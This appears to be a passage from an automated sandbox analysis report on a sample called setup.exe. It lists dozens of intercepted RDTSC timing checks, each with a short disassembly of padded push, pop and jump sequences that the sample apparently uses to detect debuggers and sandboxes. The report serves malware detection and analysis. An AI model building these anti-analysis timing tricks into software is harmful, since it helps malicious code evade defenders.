                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A1479 second address: 4A1490 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0B1h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A1490 second address: 4A1494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A15D6 second address: 4A15DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A15DE second address: 4A15EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F47D8E48266h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A15EF second address: 4A1602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007F47D8E3B0AEh 0x0000000b jnc 00007F47D8E3B0A6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A1E45 second address: 4A1E4A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A50A2 second address: 4A50AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A50AE second address: 4A50B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A50B2 second address: 4A50F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edx 0x0000000c jmp 00007F47D8E3B0B3h 0x00000011 pop edx 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push eax 0x00000016 jbe 00007F47D8E3B0A6h 0x0000001c pop eax 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jc 00007F47D8E3B0ACh 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A6489 second address: 4A648D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A9FC9 second address: 4A9FCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A9FCF second address: 4A9FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A9FD5 second address: 4A9FDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A9FDE second address: 4A9FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F2001E second address: 4F20024 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F20024 second address: 4F20029 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F20029 second address: 4F20076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F47D8E3B0B4h 0x0000000f push eax 0x00000010 jmp 00007F47D8E3B0ABh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F47D8E3B0B6h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov di, 3A30h 0x00000024 mov ah, dh 0x00000026 popad 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F10148 second address: 4F1015F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48272h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F1015F second address: 4F1017F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov si, 4C99h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 mov eax, 648EF5D1h 0x00000015 mov al, 1Eh 0x00000017 popad 0x00000018 pop ebp 0x00000019 pushad 0x0000001a mov ecx, edi 0x0000001c push eax 0x0000001d push edx 0x0000001e mov ah, bh 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F40705 second address: 4F4070B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F4070B second address: 4F4070F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F4070F second address: 4F4075F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f mov edi, esi 0x00000011 pushfd 0x00000012 jmp 00007F47D8E48270h 0x00000017 jmp 00007F47D8E48275h 0x0000001c popfd 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F47D8E4826Dh 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE0096 second address: 4EE009C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE009C second address: 4EE00A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE00A0 second address: 4EE00BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov si, di 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE00BC second address: 4EE00C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE00C1 second address: 4EE00D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0B1h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE00D6 second address: 4EE00F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F47D8E48273h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE00F4 second address: 4EE012C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F47D8E3B0ABh 0x0000000b add cl, 0000006Eh 0x0000000e jmp 00007F47D8E3B0B9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE012C second address: 4EE0130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE0130 second address: 4EE0136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE0136 second address: 4EE0167 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48272h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F47D8E48270h 0x00000010 push dword ptr [ebp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE0167 second address: 4EE016B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE016B second address: 4EE0171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE0171 second address: 4EE0177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE0177 second address: 4EE017B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE017B second address: 4EE019E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F47D8E3B0B4h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE019E second address: 4EE01A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F00DBA second address: 4F00DE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F47D8E3B0AAh 0x00000012 mov ax, 3C51h 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F00DE2 second address: 4F00E84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F47D8E4826Dh 0x00000009 sub si, 8F66h 0x0000000e jmp 00007F47D8E48271h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b mov esi, 2C049B69h 0x00000020 mov esi, 4E428525h 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F47D8E4826Eh 0x0000002f adc esi, 6327B238h 0x00000035 jmp 00007F47D8E4826Bh 0x0000003a popfd 0x0000003b pushfd 0x0000003c jmp 00007F47D8E48278h 0x00000041 add eax, 6328AC98h 0x00000047 jmp 00007F47D8E4826Bh 0x0000004c popfd 0x0000004d popad 0x0000004e pop ebp 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F47D8E48275h 0x00000056 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F00E84 second address: 4F00E89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F008AD second address: 4F008BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F008BC second address: 4F0094D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 44h 0x00000005 mov ecx, 488C28C7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov si, 69BFh 0x00000013 mov esi, 2BCAE2DBh 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F47D8E3B0ADh 0x00000022 or al, 00000066h 0x00000025 jmp 00007F47D8E3B0B1h 0x0000002a popfd 0x0000002b mov bl, ah 0x0000002d popad 0x0000002e pushfd 0x0000002f jmp 00007F47D8E3B0ADh 0x00000034 add eax, 30B38CC6h 0x0000003a jmp 00007F47D8E3B0B1h 0x0000003f popfd 0x00000040 popad 0x00000041 xchg eax, ebp 0x00000042 jmp 00007F47D8E3B0AEh 0x00000047 mov ebp, esp 0x00000049 jmp 00007F47D8E3B0B0h 0x0000004e pop ebp 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F0094D second address: 4F00951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F00951 second address: 4F0096E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F007F8 second address: 4F007FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F007FC second address: 4F00800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F00800 second address: 4F00806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F00806 second address: 4F0081F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, bx 0x00000011 mov ecx, ebx 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F0081F second address: 4F00825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F00825 second address: 4F00829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F00829 second address: 4F00862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop eax 0x0000000e pushfd 0x0000000f jmp 00007F47D8E48271h 0x00000014 xor ecx, 278D4C96h 0x0000001a jmp 00007F47D8E48271h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F00862 second address: 4F00868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F00868 second address: 4F0086C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F004DB second address: 4F00577 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e mov ebx, esi 0x00000010 pushfd 0x00000011 jmp 00007F47D8E3B0AEh 0x00000016 jmp 00007F47D8E3B0B5h 0x0000001b popfd 0x0000001c popad 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F47D8E3B0B3h 0x00000027 or esi, 17473A4Eh 0x0000002d jmp 00007F47D8E3B0B9h 0x00000032 popfd 0x00000033 pushad 0x00000034 mov esi, 3521462Dh 0x00000039 jmp 00007F47D8E3B0AAh 0x0000003e popad 0x0000003f popad 0x00000040 pop ebp 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 mov cx, bx 0x00000047 push ebx 0x00000048 pop esi 0x00000049 popad 0x0000004a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F10353 second address: 4F1036D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F20386 second address: 4F203B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F47D8E3B0AFh 0x00000008 pop ecx 0x00000009 mov eax, edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F47D8E3B0B1h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F203B2 second address: 4F203B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F203B8 second address: 4F203D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F47D8E3B0B1h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F203D6 second address: 4F203EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48271h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F203EB second address: 4F203FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0ACh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F203FB second address: 4F203FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F0071C second address: 4F00746 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 96D2h 0x00000007 mov ecx, edx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F47D8E3B0B2h 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ax, dx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F00746 second address: 4F0074B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F0074B second address: 4F0075A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0ABh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F0075A second address: 4F00781 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F00781 second address: 4F00785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F00785 second address: 4F0078B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F0078B second address: 4F00791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F00791 second address: 4F00795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F10F76 second address: 4F10F7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F10F7C second address: 4F10F80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F10F80 second address: 4F10F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F10F8F second address: 4F10F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F10F93 second address: 4F10F97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F10F97 second address: 4F10F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F201C5 second address: 4F201C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F201C9 second address: 4F201CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F201CF second address: 4F201E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0ADh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F40011 second address: 4F40021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E4826Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F40021 second address: 4F40057 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a mov ch, 41h 0x0000000c jmp 00007F47D8E3B0AFh 0x00000011 popad 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F47D8E3B0B5h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F40057 second address: 4F40067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E4826Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F40067 second address: 4F4007D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47D8E3B0AAh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F4007D second address: 4F40083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F40083 second address: 4F40129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a push esi 0x0000000b movsx edx, si 0x0000000e pop eax 0x0000000f call 00007F47D8E3B0ADh 0x00000014 jmp 00007F47D8E3B0B0h 0x00000019 pop eax 0x0000001a popad 0x0000001b mov dword ptr [esp], ecx 0x0000001e jmp 00007F47D8E3B0B1h 0x00000023 mov eax, dword ptr [774365FCh] 0x00000028 pushad 0x00000029 jmp 00007F47D8E3B0ACh 0x0000002e pushfd 0x0000002f jmp 00007F47D8E3B0B2h 0x00000034 and eax, 00816F08h 0x0000003a jmp 00007F47D8E3B0ABh 0x0000003f popfd 0x00000040 popad 0x00000041 test eax, eax 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 call 00007F47D8E3B0ABh 0x0000004b pop ecx 0x0000004c call 00007F47D8E3B0B9h 0x00000051 pop ecx 0x00000052 popad 0x00000053 rdtsc
